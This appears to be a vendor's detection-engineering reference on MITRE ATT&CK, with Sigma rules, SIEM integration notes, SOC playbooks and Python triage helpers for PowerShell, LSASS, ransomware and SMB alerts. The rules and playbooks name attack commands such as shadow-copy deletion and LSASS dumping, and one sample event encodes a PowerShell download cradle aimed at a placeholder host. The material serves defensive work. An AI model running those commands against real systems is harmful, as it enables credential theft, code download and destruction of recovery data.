⚔ Detection Engineering Reference

MITRE ATT&CK
Detection Engineering Hub

Production-grade detection coverage across the full ATT&CK matrix. Sigma rules, SIEM integration patterns, SOC playbooks, and enterprise detection engineering guidance built for analyst teams.

14 ATT&CK Tactics · 200+ Techniques · Sigma Detection Format · 6 SIEM Integrations

14 ATT&CK Tactics — Adversary Lifecycle

Complete MITRE ATT&CK Enterprise matrix coverage from initial access through exfiltration and impact.

TA0001
Initial Access
Adversary techniques to gain an initial foothold within a network — phishing, exploit public-facing applications, supply chain compromise.
Key techniques: T1566 · T1190 · T1195 · T1133
Detection coverage: HIGH · 9 techniques
TA0002
Execution
Techniques for running adversary-controlled code — command and scripting interpreters, scheduled tasks, WMI, container execution.
Key techniques: T1059 · T1053 · T1047 · T1204
Detection coverage: HIGH · 14 techniques
TA0003
Persistence
Techniques adversaries use to maintain their foothold — boot/logon autostart, account creation, scheduled tasks, implants, hijack execution flow.
Key techniques: T1547 · T1098 · T1543 · T1505
Detection coverage: HIGH · 19 techniques
TA0004
Privilege Escalation
Gaining higher-level permissions — process injection, token manipulation, exploitation of vulnerabilities, abuse elevation control mechanisms.
Key techniques: T1055 · T1134 · T1548 · T1068
Detection coverage: HIGH · 13 techniques
TA0005
Defense Evasion
Techniques to avoid detection — obfuscation, masquerading, disabling security tools, living-off-the-land binaries (LOLBins), rootkits.
Key techniques: T1562 · T1036 · T1027 · T1218
Detection coverage: MED · 42 techniques
TA0006
Credential Access
Stealing credentials — credential dumping, OS credential store access, brute force, keylogging, MFA interception.
Key techniques: T1003 · T1110 · T1557 · T1539
Detection coverage: HIGH · 17 techniques
TA0007
Discovery
Internal network reconnaissance — account, file, network, system, and domain discovery for situational awareness before lateral movement.
Key techniques: T1087 · T1083 · T1046 · T1018
Detection coverage: MED · 31 techniques
TA0008
Lateral Movement
Moving through the target environment — remote services, pass-the-hash, pass-the-ticket, exploitation of remote services.
Key techniques: T1021 · T1550 · T1563 · T1570
Detection coverage: HIGH · 9 techniques
TA0009
Collection
Gathering data of interest — data from local and network drives, email collection, screen capture, input capture, clipboard data.
Key techniques: T1560 · T1114 · T1113 · T1056
Detection coverage: MED · 17 techniques
TA0010
Exfiltration
Stealing data from the target network — exfiltration over C2 channel, HTTPS, DNS, cloud storage, physical media, and scheduled transfers.
Key techniques: T1041 · T1048 · T1567 · T1029
Detection coverage: MED · 9 techniques
TA0011
Command & Control
Communicating with compromised systems — web protocols, encrypted channels, domain fronting, fast-flux DNS, proxy chaining.
Key techniques: T1071 · T1573 · T1090 · T1568
Detection coverage: HIGH · 18 techniques
TA0040
Impact
Disrupting availability or integrity — data encryption for ransom, disk wiping, denial of service, resource hijacking, defacement.
Key techniques: T1486 · T1485 · T1498 · T1496
Detection coverage: HIGH · 13 techniques
TA0042
Resource Development
Establishing resources for operations — acquire infrastructure, develop capabilities, stage capabilities, obtain capabilities from third parties.
Key techniques: T1583 · T1584 · T1585 · T1587
Detection coverage: LOW · 8 techniques
TA0043
Reconnaissance
Gathering information about the target — active scanning, gather victim info, phishing for information, search open sources (OSINT).
Key techniques: T1595 · T1592 · T1589 · T1598
Detection coverage: LOW · 10 techniques

Highest-Value Techniques — Detection ROI

Techniques with the highest adversary usage frequency and broadest applicability across threat actor groups. Detect these first.

Priority 1 — Universal
T1059.001 — PowerShell
Command and Scripting Interpreter: PowerShell
Execution · Used by 80%+ of threat actor groups
Adversaries abuse PowerShell for execution, discovery, lateral movement, and C2. Encoded commands (-EncodedCommand), download cradles (IEX), AMSI bypass, and constrained language mode bypasses are primary detection targets.
Critical Execution T1059.001
Priority 1 — Universal
T1566.001 — Spearphishing Attachment
Phishing: Spearphishing Attachment
Initial Access · #1 initial access vector industry-wide
Malicious email attachments — Office macros, LNK files, ISO images, PDF exploits. Initial access into 90%+ of enterprise breaches starts here. Detections must cover email gateway, endpoint, and sandbox detonation signals.
Critical Initial Access T1566.001
Priority 1 — Ransomware
T1486 — Data Encrypted for Impact
Data Encrypted for Impact
Impact · Terminal ransomware encryption stage
Ransomware encryption phase — ChaCha20/AES bulk file encryption, extension renaming, shadow copy deletion (vssadmin), MBR destruction. Detecting this late-stage TTP requires behavioral analytics and honeypot file tripwires.
Critical Impact T1486
Priority 1 — Credential
T1003.001 — LSASS Memory
OS Credential Dumping: LSASS Memory
Credential Access · Pass-the-hash pivot enabler
Mimikatz, ProcDump, comsvcs.dll MiniDump — dumping LSASS process memory to extract NTLM hashes, Kerberos tickets, and clear-text credentials. PPL bypass and kernel driver attacks are active evasion routes.
Critical Credential Access T1003.001
Priority 2 — Living-off-Land
T1218 — Signed Binary Proxy Execution
System Binary Proxy Execution (LOLBins)
Defense Evasion · Antivirus bypass mechanism
Using legitimate signed Windows binaries to execute malicious payloads — regsvr32, mshta, certutil, wscript, rundll32. These bypass application whitelisting and appear as normal system activity without behavioral context.
High Defense Evasion T1218
Priority 2 — Lateral Movement
T1021.002 — SMB/Windows Admin Shares
Remote Services: SMB/Windows Admin Shares
Lateral Movement · Post-credential compromise pivot
Using stolen credentials to access ADMIN$, C$, IPC$ shares for file copy and execution. PsExec, Impacket smbexec/wmiexec, and Cobalt Strike SMB lateral movement all generate characteristic SMB authentication events.
High Lateral Movement T1021.002

Production Detection Rules — Sigma Format

Platform-agnostic Sigma rules for high-priority ATT&CK techniques. Convert to Splunk SPL, Elastic EQL, Microsoft Sentinel KQL, or Chronicle using sigma-cli (pySigma), the successor to the legacy sigmatools/sigmac converter.

PowerShell Encoded Command Execution
Critical Execution T1059.001
Detects PowerShell execution with Base64-encoded commands via -EncodedCommand or -enc flags — a primary technique for obfuscating download cradles, AMSI bypasses, and in-memory payload execution.
title: PowerShell Encoded Command Execution
id: a6eb3fef-8b15-4b8e-9d5a-7c1e2f3d8b9a
status: stable   # Sigma only allows stable/test/experimental/deprecated/unsupported; "production" is rejected by sigma-cli
description: Detects PowerShell -EncodedCommand execution used to obfuscate malicious payloads and bypass defenses
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: CYBERDUDEBIVASH SENTINEL APEX Detection Engineering
date: 2026-05-28
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:   # Sigma string matching is case-insensitive, so -enc also covers -ENC
      - ' -EncodedCommand '
      - ' -enc '
      - ' -EC '
      - ' -e '
  filter_legitimate:
    ParentImage|endswith:
      - '\sccm.exe'
      - '\ccmexec.exe'
  condition: selection and not filter_legitimate
falsepositives:
  - Legitimate automation scripts using encoded commands
  - SCCM client management operations
level: high
Correlated detection signals:
  • AMSI bypass strings in CommandLine
  • IEX/Invoke-Expression with download
  • Outbound HTTP/S from powershell.exe
  • Unusual parent process (Word, Excel, browser)
  • Base64 length > 500 characters
  • -NoProfile -WindowStyle Hidden flags
LSASS Memory Access — Credential Dumping
Critical Credential Access T1003.001
Detects attempts to read LSASS process memory to extract credential material. Covers ProcDump, comsvcs.dll MiniDump, Task Manager dump, and direct LSASS handle acquisition via OpenProcess.
title: LSASS Memory Dump Attempt
id: b9d7f3c2-1e4a-5b8d-9c0f-2a3e4d5f6b7c
status: stable   # Sigma has no "production" status; stable is the closest valid value
description: Detects LSASS memory access for credential extraction
tags:
  - attack.credential_access
  - attack.t1003.001
logsource:
  category: process_access
  product: windows
detection:
  selection_lsass_access:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess|contains:
      - '0x1010'
      - '0x1410'
      - '0x147a'
      - '0x143a'
  # process_access events (Sysmon Event 10) carry SourceImage/TargetImage/GrantedAccess,
  # not Image/CommandLine, so the tool-specific selections key on the source process
  # and still require LSASS as the target.
  selection_procdump:
    TargetImage|endswith: '\lsass.exe'
    SourceImage|endswith: '\procdump.exe'
  selection_comsvcs:
    TargetImage|endswith: '\lsass.exe'
    SourceImage|endswith: '\rundll32.exe'   # comsvcs.dll MiniDump is invoked through rundll32
  condition: 1 of selection_*
falsepositives:
  - CrowdStrike/SentinelOne agent self-inspection
  - Authorized red team activity
  - Windows Error Reporting (WER) creating crash dumps
level: critical
Correlated detection signals:
  • SeDebugPrivilege token acquisition
  • Mimikatz binary hash or strings
  • .dmp file written to unusual path
  • LSASS handle with PROCESS_VM_READ
  • PPL bypass driver load event
  • Subsequent pass-the-hash SMB auth
Ransomware — Bulk File Encryption & Shadow Copy Deletion
Critical Impact T1486
Detects the terminal encryption phase of ransomware operations — rapid file extension changes, vssadmin shadow copy deletion, MBR wiping, and ransom note creation. At this stage, containment is critical within minutes.
title: Ransomware Shadow Copy Deletion and Bulk Encryption
id: c3e8a1d4-2f5b-6c9e-0a1b-3d4e5f6c7d8e
status: stable   # Sigma has no "production" status; stable is the closest valid value
description: Detects ransomware pre-encryption and encryption activity
tags:
  - attack.impact
  - attack.t1486
  - attack.t1490
logsource:
  category: process_creation
  product: windows
# Process-creation telemetry covers the recovery-inhibition stage (T1490); the
# bulk-encryption signals listed below need file-event analytics, not this rule.
detection:
  selection_vssadmin:
    Image|endswith: '\vssadmin.exe'
    CommandLine|contains:
      - 'delete shadows'
      - 'resize shadowstorage'
  selection_wbadmin:
    Image|endswith: '\wbadmin.exe'
    CommandLine|contains: 'delete catalog'
  selection_bcdedit:
    Image|endswith: '\bcdedit.exe'
    CommandLine|contains:
      - 'recoveryenabled no'
      - 'bootstatuspolicy ignoreallfailures'
  selection_cipher:
    Image|endswith: '\cipher.exe'
    CommandLine|contains: '/w:'
  condition: 1 of selection_*
falsepositives:
  - Backup software performing legitimate shadow management
  - Windows Server Backup configuration
level: critical
Correlated detection signals:
  • High-frequency file rename events (>100/sec)
  • Novel file extensions appearing across shares
  • README.txt / HOW_TO_DECRYPT.txt created
  • CPU spike + disk I/O saturation
  • Network share enumeration prior to encryption
  • taskkill /F of backup/AV processes
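The first two correlated signals as a sliding-window analytic, added here as an example and not code from the page: it counts renames per host inside a one-second window against the page's 100/sec threshold and attaches any extension not present in a baseline set. The event tuple layout, host names, sample paths and the baseline extension set are assumptions constructed for the sample.

```python
from collections import defaultdict, deque

RENAME_THRESHOLD = 100   # renames per second, the page's burst signal
WINDOW_SECONDS = 1.0

def extension(path):
    """Lower-cased extension of a Windows or UNC path, '' when there is none."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def detect_rename_bursts(events, baseline_exts):
    """events: (ts_seconds, host, old_path, new_path) tuples sorted by time.
    baseline_exts: extensions normal for the estate (assumed known from inventory).
    Emits one alert per host per burst once the window holds >= RENAME_THRESHOLD
    renames, listing extensions seen during the burst that are not in the baseline."""
    window = defaultdict(deque)      # host -> rename timestamps inside the window
    novel = defaultdict(set)         # host -> extensions outside the baseline
    in_burst = defaultdict(bool)
    alerts = []
    for ts, host, old_path, new_path in events:
        q = window[host]
        q.append(ts)
        while ts - q[0] > WINDOW_SECONDS:
            q.popleft()
        new_ext = extension(new_path)
        if new_ext and new_ext != extension(old_path) and new_ext not in baseline_exts:
            novel[host].add(new_ext)
        if len(q) >= RENAME_THRESHOLD and not in_burst[host]:
            in_burst[host] = True
            alerts.append({"host": host, "ts": ts, "renames_per_window": len(q),
                           "novel_extensions": sorted(novel[host])})
        elif len(q) < RENAME_THRESHOLD:
            in_burst[host] = False   # burst over; a later burst alerts again
    return alerts

def constructed_events():
    """Constructed sample: FS01 renames 150 documents to .locked in about half a
    second (ransomware-like); WS07 renames five files at human pace."""
    events = [(1000.0 + i * 0.003, "FS01",
               f"\\\\FS01\\share\\doc{i}.docx", f"\\\\FS01\\share\\doc{i}.docx.locked")
              for i in range(150)]
    events += [(1000.0 + i * 2.0, "WS07",
                f"C:\\Users\\a\\f{i}.tmp", f"C:\\Users\\a\\f{i}.txt") for i in range(5)]
    return sorted(events)

BASELINE_EXTENSIONS = {"docx", "xlsx", "pdf", "txt", "tmp"}   # constructed baseline

if __name__ == "__main__":
    for alert in detect_rename_bursts(constructed_events(), BASELINE_EXTENSIONS):
        print(alert)
```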
Lateral Movement via SMB Admin Shares
High Lateral Movement T1021.002
Detects lateral movement using administrative SMB shares (ADMIN$, C$, IPC$) — characteristic of PsExec, Impacket tooling, Cobalt Strike lateral movement modules, and automated ransomware propagation.
title: Lateral Movement via SMB Admin Share Access
id: d4f9b2e5-3a6c-7d0f-1b2c-4e5f6a7b8c9d
status: stable   # Sigma has no "production" status; stable is the closest valid value
description: Detects suspicious SMB administrative share access indicating lateral movement activity
tags:
  - attack.lateral_movement
  - attack.t1021.002
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5140   # "A network share object was accessed"; ShareName is logged as \\*\ADMIN$
    ShareName|contains:
      - '\ADMIN$'
      - '\C$'
      - '\IPC$'
  filter_machine_accounts:   # computer accounts (names ending in $) touching shares is routine AD traffic
    SubjectUserName|endswith: '$'
  filter_local:
    IpAddress:
      - '127.0.0.1'
  condition: selection and not 1 of filter_*
falsepositives:
  - Legitimate remote administration (SCCM, Ansible)
  - IT helpdesk operations
level: medium
Correlated detection signals:
  • New service installation (Event 7045) on remote host
  • PSEXESVC service creation
  • Logon Type 3 from non-admin workstation
  • Executable dropped to ADMIN$ then executed
  • Pass-the-hash NTLM authentication
  • Spray of admin share access to multiple hosts

SIEM & EDR Integration Guidance

Sigma rules convert to native query languages for all major platforms. Sentinel APEX Detection Packs include pre-converted, tuned rules for each platform.

Microsoft Sentinel
Convert Sigma to KQL (Kusto Query Language). Deploy as Analytics Rules with MITRE ATT&CK tactic mapping and alert enrichment via UEBA.
Sigma → KQL via sigma-cli + kusto backend
MITRE ATT&CK tactic/technique metadata
UEBA enrichment for behavioral context
Automation rules for SOAR integration
Alert fusion with incident correlation
Splunk SIEM
Convert Sigma to Splunk SPL. Deploy as correlation searches in Enterprise Security with risk-based alerting (RBA) and ESCU framework alignment.
Sigma → SPL via sigma-cli + splunk backend
Risk-Based Alerting (RBA) risk scores
ESCU detection framework alignment
Notable event generation + correlation
Adaptive Response for automated containment
Elastic Security
Convert Sigma to Elastic EQL or ES|QL. Deploy via Detection Engine with prebuilt rule templates and ML-based anomaly detection jobs.
Sigma → EQL via sigma-cli + elasticsearch
Event Query Language (EQL) sequences
ML anomaly detection integration
Entity Analytics for user risk scoring
Fleet integration for endpoint telemetry
CrowdStrike Falcon
Deploy Sigma as Custom IOA (Indicator of Attack) rules or Fusion SOAR workflows. Correlate with Threat Graph and identity protection events.
Custom IOA rules via Falcon Prevent
Falcon Insight XDR event search
Threat Graph behavioral correlation
Fusion SOAR automated response
Identity Protection Kerberos detections
Google Chronicle
Convert Sigma to YARA-L 2.0 for Chronicle SIEM. Deploy as Rules with detection engine scheduling and context-enriched entity graph.
Sigma → YARA-L via sigma-cli + chronicle
Entity enrichment via the UDM (Unified Data Model)
IOC retrohunt across petabyte-scale logs
SOAR integration via Chronicle SOAR
GCP security telemetry native ingestion
Palo Alto Cortex XDR
Deploy BIOC (Behavioral Indicator of Compromise) rules for ATT&CK technique coverage. Correlate XDR alerts with Cortex XSOAR automated response.
BIOC rule creation for behavioral detection
XQL (XDR Query Language) hunting
Causality Chain (CC) visualization
Cortex XSOAR SOAR automation
Unit 42 threat intel integration

Detection Coverage Matrix — Enterprise SOC

Recommended detection coverage targets for enterprise SOC teams. Gaps represent high-priority investments for detection engineering roadmaps.

Tactic            | Technique                                 | T-ID      | EDR | SIEM | Network | UEBA | Priority
------------------|-------------------------------------------|-----------|-----|------|---------|------|---------
Initial Access    | Spearphishing Attachment                  | T1566.001 | H   | H    | M       | L    | P1
Execution         | PowerShell                                | T1059.001 | H   | H    | L       | M    | P1
Execution         | Windows Management Instrumentation        | T1047     | H   | M    | L       | L    | P2
Persistence       | Boot/Logon Autostart — Registry Run Keys  | T1547.001 | H   | H    | L       | L    | P2
Privilege Esc.    | Process Injection                         | T1055     | H   | M    | L       | L    | P1
Defense Evasion   | Signed Binary Proxy Exec (LOLBins)        | T1218     | M   | H    | L       | L    | P2
Credential Access | OS Credential Dumping — LSASS             | T1003.001 | H   | H    | L       | H    | P1
Lateral Movement  | SMB / Windows Admin Shares                | T1021.002 | M   | H    | H       | H    | P1
C&C               | Encrypted Channel — TLS                   | T1573.002 | L   | M    | H       | M    | P2
Exfiltration      | Exfiltration Over Web Service             | T1567     | L   | M    | H       | H    | P2
Impact            | Data Encrypted for Impact (Ransomware)    | T1486     | H   | H    | L       | H    | P1
Impact            | Inhibit System Recovery                   | T1490     | H   | H    | L       | L    | P1

Legend: H = High coverage (detect reliably) · M = Medium (partial, tuning required) · L = Low/gap (detection investment needed)

Detection Response Playbooks

Structured response workflows for high-priority ATT&CK technique detections. Designed for L1/L2 analysts with clear triage, escalation, and containment steps.

Credential Threat
LSASS Dump Alert Triage — T1003.001
1. Confirm LSASS access event — validate GrantedAccess flags (0x1010, 0x1410, 0x147a)
2. Identify source process — check parent chain for unusual ancestry (cmd.exe, powershell.exe, Office app)
3. Check for Mimikatz strings in memory or on disk — search endpoint for sekurlsa, logonpasswords, wdigest
4. Review subsequent auth logs — look for lateral movement via NTLM pass-the-hash within 30 minutes
5. Isolate endpoint if confirmed — revoke affected user credentials via AD immediately
6. Force password reset for all accounts active on host at time of dump
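Steps 1 and 2 as an added Python helper, not the page's own code: it decodes the GrantedAccess mask into the Windows PROCESS_* rights and tests the PROCESS_VM_READ bit directly, which also catches masks such as 0x1fffff that a string match on the three listed values would not. Field names follow Sysmon Event 10; the sample events and the path allow-list are constructed.

```python
# Windows process access rights (winnt.h); Sysmon Event 10 reports the granted mask as hex text.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF   # standard rights | SYNCHRONIZE | all specific rights

def parse_mask(value):
    """GrantedAccess arrives as '0x1410'-style text in Sysmon; accept ints too."""
    return int(value, 16) if isinstance(value, str) else int(value)

def decode_mask(mask):
    """Names of the rights set in a mask, lowest bit first."""
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

def triage_lsass_access(event, allowed_sources=()):
    """Playbook steps 1-2 for one process_access event, returning (verdict, rights).
    'dump_capable' means the handle can read LSASS memory, which every dump technique
    on the page needs; a handle with only QUERY rights is routine ('query_only').
    allowed_sources is a path-suffix allow-list for agents known to inspect LSASS;
    treat it as a triage hint only and confirm signer and hash before closing."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return "not_lsass", []
    mask = parse_mask(event["GrantedAccess"])
    rights = decode_mask(mask)
    source = event["SourceImage"].lower()
    if any(source.endswith(a.lower()) for a in allowed_sources):
        return "allowlisted", rights
    if mask & PROCESS_VM_READ or rights == ["PROCESS_ALL_ACCESS"]:
        return "dump_capable", rights
    return "query_only", rights

# Constructed Sysmon-style events. The dump-tool path is invented; MsMpEng.exe is the
# Defender engine and stands in for an EDR agent that legitimately opens LSASS.
SAMPLE_EVENTS = [
    {"SourceImage": "C:\\Temp\\procdump64.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["SourceImage"], triage_lsass_access(ev, allowed_sources=("\\MsMpEng.exe",)))
```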
Ransomware — CRITICAL
Active Ransomware Encryption — T1486
1. Confirm encryption indicator — vssadmin delete or mass file extension change events
2. Immediately isolate affected host from network — block all outbound and lateral SMB
3. Identify patient zero — trace lateral movement path back to initial infection vector
4. Scan all adjacent systems — check for dormant ransomware payload pre-detonation
5. Invoke IR retainer and notify legal — ransomware is a reportable incident in most jurisdictions
6. Preserve forensic artifacts before remediation — memory dump, SIEM logs, network PCAP
Lateral Movement
SMB Admin Share Lateral Movement — T1021.002
1. Identify source and destination hosts — map Logon Type 3 events with admin share access (Event 5140)
2. Check for service installation on destination — Event 7045 PSEXESVC or unusual service name
3. Trace credential source — identify which account was used and how it was obtained
4. Map lateral movement graph — identify all hosts accessed from source within prior 24 hours
5. Contain affected accounts — disable and rotate credentials for compromised service accounts
6. Block NTLM authentication where Kerberos is available — reduce pass-the-hash exposure
Execution Alert
Suspicious PowerShell Execution — T1059.001
1. Decode Base64 command — use CyberChef or in-SIEM decode to reveal actual payload intent
2. Check for download cradle — IEX, Invoke-WebRequest, DownloadString with external URL
3. Inspect parent process — Office document or browser spawn is high-confidence phishing indicator
4. Review network connections from powershell.exe — check DNS queries and outbound HTTP/S
5. Detonate any dropped files in sandbox — extract IOCs for platform-wide blocking
6. Correlate with email gateway — identify delivery method and scope of phishing campaign
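The encoded-command rule from the Sigma section and steps 1 to 3 of this playbook, as an added Python example that is not the page's code: it applies the rule's selection and filter logic to process_creation events, decodes the -EncodedCommand blob (Base64 of the script as UTF-16LE text) and flags the page's correlated signals. The sample events, the Office parent list and the example.invalid URL are constructed.

```python
import base64
import re
# Values from the page's Sigma rule; field names follow Sysmon/Sigma process_creation.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
ENCODED_FLAGS = (" -encodedcommand ", " -enc ", " -ec ", " -e ")
FILTERED_PARENTS = ("\\sccm.exe", "\\ccmexec.exe")
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\outlook.exe")   # assumed list
CRADLE_INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile", "invoke-webrequest",
                     "net.webclient", "amsiutils", "amsiinitfailed", "frombase64string", "http://", "https://")
HIDDEN_FLAGS = ("-noprofile", "-windowstyle hidden")
LONG_BLOB = 500   # Base64 length signal from the correlated-signals list
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc ...);
# the pattern takes those but not -ExecutionPolicy, which also starts with -e.
_ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def matches_rule(event):
    """Sigma semantics of the rule: case-insensitive endswith/contains, selection and not filter."""
    image, cmd = event["Image"].lower(), event["CommandLine"].lower()
    parent = event.get("ParentImage", "").lower()
    selection = image.endswith(POWERSHELL_IMAGES) and any(f in cmd for f in ENCODED_FLAGS)
    return selection and not parent.endswith(FILTERED_PARENTS)

def decode_encoded_command(cmd):
    """Playbook step 1: the blob is Base64 of the script text encoded as UTF-16LE."""
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # truncated or non-UTF-16 blob: hand the raw value to manual review

def triage(event):
    """Analyst summary: rule verdict, decoded script, and the page's correlated signals."""
    cmd = event["CommandLine"]
    blob = _ENC_RE.search(cmd)
    script = decode_encoded_command(cmd) or ""
    return {
        "rule_match": matches_rule(event),
        "decoded": script or None,
        "cradle_indicators": [i for i in CRADLE_INDICATORS if i in script.lower()],
        "hidden_flags": [f for f in HIDDEN_FLAGS if f in cmd.lower()],
        "long_blob": blob is not None and len(blob.group(1)) > LONG_BLOB,
        "office_parent": event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS),
    }

def encode_ps(script):
    """Constructed helper: produce a blob the way PowerShell expects it, for the samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [   # constructed events; example.invalid is a reserved, unroutable name
    {"Image": PS_IMAGE, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"Image": PS_IMAGE, "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + encode_ps("Get-Service ccmexec")},
    {"Image": PS_IMAGE, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inv.ps1"},
]
```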
Defense Evasion
LOLBin Proxy Execution — T1218
1. Identify LOLBin in use — certutil, mshta, regsvr32, rundll32, wscript, cmstp
2. Extract payload path or URL from CommandLine — identify remote or local payload source
3. Check LOLBin child processes and network connections — map post-execution activity
4. Correlate with AppLocker/WDAC bypass indicators if policy is deployed
5. Block LOLBin command patterns at endpoint policy layer if not already blocked
Persistence Detection
Registry Autostart Persistence — T1547.001
1. Identify new registry Run/RunOnce key — check HKLM and HKCU for unsigned or unusual entries
2. Validate executable path — check file hash against threat intel, verify code signing
3. Check registry write process ancestry — map the process chain that installed the key
4. Review creation timestamp against other security events in same timeframe
5. Remove malicious key and quarantine executable — verify removal and reboot persistence

Deploy Production-Grade ATT&CK Detection Coverage

Sentinel APEX provides pre-tuned, production-certified detection packs for your SIEM platform — built by detection engineers for SOC operations teams.

Detection Pack Library
300+ Sigma rules pre-converted for Splunk, Sentinel, Elastic, and Chronicle. Full ATT&CK coverage with false-positive baselines and tuning guidance for enterprise environments.
Detection Engineering Consultation
Bespoke detection engineering for your environment. Detection gap analysis, Sigma rule development, SIEM tuning, threat hunting playbooks, and SOC maturity assessment.
Threat Intelligence API
Real-time ATT&CK technique telemetry via Sentinel APEX API. Enrich your SIEM alerts with live adversary TTP data, IOC context, and detection priority scoring.
